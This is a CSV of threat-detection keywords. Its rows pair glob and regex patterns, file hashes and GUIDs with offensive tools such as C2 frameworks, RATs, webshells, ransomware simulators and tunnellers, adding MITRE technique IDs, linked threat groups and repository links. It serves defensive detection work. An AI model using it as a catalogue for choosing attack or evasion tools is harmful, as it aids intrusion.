"*C2Server by @JoelGMSec*",".{0,1000}C2Server\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","36860"
"*'c2server'*",".{0,1000}\'c2server\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","36861"
"*C2Server.cs*",".{0,1000}C2Server\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","36862"
"*c2-server.mtattab.com/reverseShellClients*",".{0,1000}c2\-server\.mtattab\.com\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","36863"
"*C2Server.ps1*",".{0,1000}C2Server\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","10","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","36864"
"*c2server_arm_musl*",".{0,1000}c2server_arm_musl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36865"
"*c2server_armv7*",".{0,1000}c2server_armv7.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36866"
"*c2server_debug*",".{0,1000}c2server_debug.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36867"
"*c2server_linux*",".{0,1000}c2server_linux.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","#linux","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36868"
"*c2server_macos*",".{0,1000}c2server_macos.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36869"
"*c2server_release*",".{0,1000}c2server_release.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36870"
"*c2server_windows*",".{0,1000}c2server_windows.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","36871"
"*C2ServerThreadTerminated*",".{0,1000}C2ServerThreadTerminated.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","36872"
"*c2-sessions ping*",".{0,1000}c2\-sessions\sping.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36873"
"*c2-sessions quit*",".{0,1000}c2\-sessions\squit.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36874"
"*C2TaskMessage.*",".{0,1000}C2TaskMessage\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","36875"
"*c2VydmVyMS5jaWEuZ292*",".{0,1000}c2VydmVyMS5jaWEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","36876"
"*C2WebSocketHandler.*",".{0,1000}C2WebSocketHandler\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","36877"
"*c3050fc06df213b534dcb6a9913efcd33c2eac91fd36467ef39376d335dc9c2a*",".{0,1000}c3050fc06df213b534dcb6a9913efcd33c2eac91fd36467ef39376d335dc9c2a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36878"
"*c309739222c4a725894081fefa4884870487c01397a94da033bb7215d66752dd*",".{0,1000}c309739222c4a725894081fefa4884870487c01397a94da033bb7215d66752dd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36880"
"*c30d5ee79c92843970d8d413f7522569277e30ec2c4b73cbc42022f2945aa218*",".{0,1000}c30d5ee79c92843970d8d413f7522569277e30ec2c4b73cbc42022f2945aa218.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","36881"
"*c310f4109a827b1023e2398cdeb50f18a6620643360065369dac75192aea8420*",".{0,1000}c310f4109a827b1023e2398cdeb50f18a6620643360065369dac75192aea8420.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36882"
"*c329eaeb077350fc1b002603d1ddfe5cfaea75109f02ff6dd86025112b0939b6*",".{0,1000}c329eaeb077350fc1b002603d1ddfe5cfaea75109f02ff6dd86025112b0939b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","36889"
"*c330560d4cd9bf1a60b1d6d23d4f7b584f668965926f45fef8db96256fa66b39*",".{0,1000}c330560d4cd9bf1a60b1d6d23d4f7b584f668965926f45fef8db96256fa66b39.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36892"
"*c3309f36c390a33a6eb46615bcd662c76e450b18d24fcb0aa8f1178f841ec7ad*",".{0,1000}c3309f36c390a33a6eb46615bcd662c76e450b18d24fcb0aa8f1178f841ec7ad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36893"
"*c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6*",".{0,1000}c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","36894"
"*c332926e2e1de5a7c696feebfd5996c8b78ef9a380a9e4a8da85a3485f0f3288*",".{0,1000}c332926e2e1de5a7c696feebfd5996c8b78ef9a380a9e4a8da85a3485f0f3288.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","36895"
"*c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908*",".{0,1000}c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36896"
"*c338e7dea1af4808f1658121b1e22e50d3a1338f338a90aa4ac33b1a8a4271a1*",".{0,1000}c338e7dea1af4808f1658121b1e22e50d3a1338f338a90aa4ac33b1a8a4271a1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36897"
"*C33A0993-A331-406C-83F5-9357DF239B30*",".{0,1000}C33A0993\-A331\-406C\-83F5\-9357DF239B30.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#GUIDproject","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","36898"
"*c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036*",".{0,1000}c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36900"
"*C34208EA-8C33-473D-A9B4-53FB40347EA0*",".{0,1000}C34208EA\-8C33\-473D\-A9B4\-53FB40347EA0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#GUIDproject #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","36901"
"*c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e*",".{0,1000}c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","36902"
"*c34383371ae8b87dfd95ae52734239fa51b164c15eaabc18c40ba950b75e8e9e*",".{0,1000}c34383371ae8b87dfd95ae52734239fa51b164c15eaabc18c40ba950b75e8e9e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36903"
"*c3444ec251cca27dd59adbfbc995f095550b7e7e25623f46799e03584845b3b9*",".{0,1000}c3444ec251cca27dd59adbfbc995f095550b7e7e25623f46799e03584845b3b9.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","36904"
"*c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79*",".{0,1000}c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36905"
"*C346B912-51F2-4A2E-ACC3-0AC2D28920C6*",".{0,1000}C346B912\-51F2\-4A2E\-ACC3\-0AC2D28920C6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","36906"
"*c35130a44f7eb55c4a2a28f50d93e98ed60b383b5697ec09a7fe26fb52505a88*",".{0,1000}c35130a44f7eb55c4a2a28f50d93e98ed60b383b5697ec09a7fe26fb52505a88.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36907"
"*c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8*",".{0,1000}c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36908"
"*c353e6e63ab1b6ceb3c715db4b053d9b112b86b680c326134514b136658aede9*",".{0,1000}c353e6e63ab1b6ceb3c715db4b053d9b112b86b680c326134514b136658aede9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36909"
"*c35aa22a683405cb282d97f125cb785cd7767591c96f4d00a27e5ac92b494f6c*",".{0,1000}c35aa22a683405cb282d97f125cb785cd7767591c96f4d00a27e5ac92b494f6c.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","36910"
"*c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b*",".{0,1000}c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","36911"
"*c36141203951c47b30ecf138ab62132a35c5d50451b862333e64602020ae40b5*",".{0,1000}c36141203951c47b30ecf138ab62132a35c5d50451b862333e64602020ae40b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36914"
"*c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f*",".{0,1000}c3663dba552ca6aa8d2c0f36fccc553d728b37464944080398f72f487430710f.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#filehash #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","36916"
"*c366f4e24e27994b39a860e046498ebebf9f9633f05a12dbd8ce65eed2a9f6f0*",".{0,1000}c366f4e24e27994b39a860e046498ebebf9f9633f05a12dbd8ce65eed2a9f6f0.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","36917"
"*c369ef94296e539c96f7a8305587d3098f0491dcdcb0cd6d006e7e2df318d19a*",".{0,1000}c369ef94296e539c96f7a8305587d3098f0491dcdcb0cd6d006e7e2df318d19a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","36918"
"*c36ad4e21ecf39ba3c2c9c201c16dc4a54b46831d893f31865b95879d6487c7b*",".{0,1000}c36ad4e21ecf39ba3c2c9c201c16dc4a54b46831d893f31865b95879d6487c7b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36919"
"*c36af69fbaa4c7daeb9d54f037f6fdc9917069483570081c6c094023b47e375a*",".{0,1000}c36af69fbaa4c7daeb9d54f037f6fdc9917069483570081c6c094023b47e375a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","36920"
"*c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf*",".{0,1000}c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","36922"
"*c37051ec2ad197c69fb617c478609636ab2ed040024957e12c5e0a6de3eddd03*",".{0,1000}c37051ec2ad197c69fb617c478609636ab2ed040024957e12c5e0a6de3eddd03.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36924"
"*C373A937-312C-4C8D-BD04-BAAF568337E7*",".{0,1000}C373A937\-312C\-4C8D\-BD04\-BAAF568337E7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","36925"
"*C37637FC-3792-4354-8F5B-7E319E4E5A6D*",".{0,1000}C37637FC\-3792\-4354\-8F5B\-7E319E4E5A6D.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","36926"
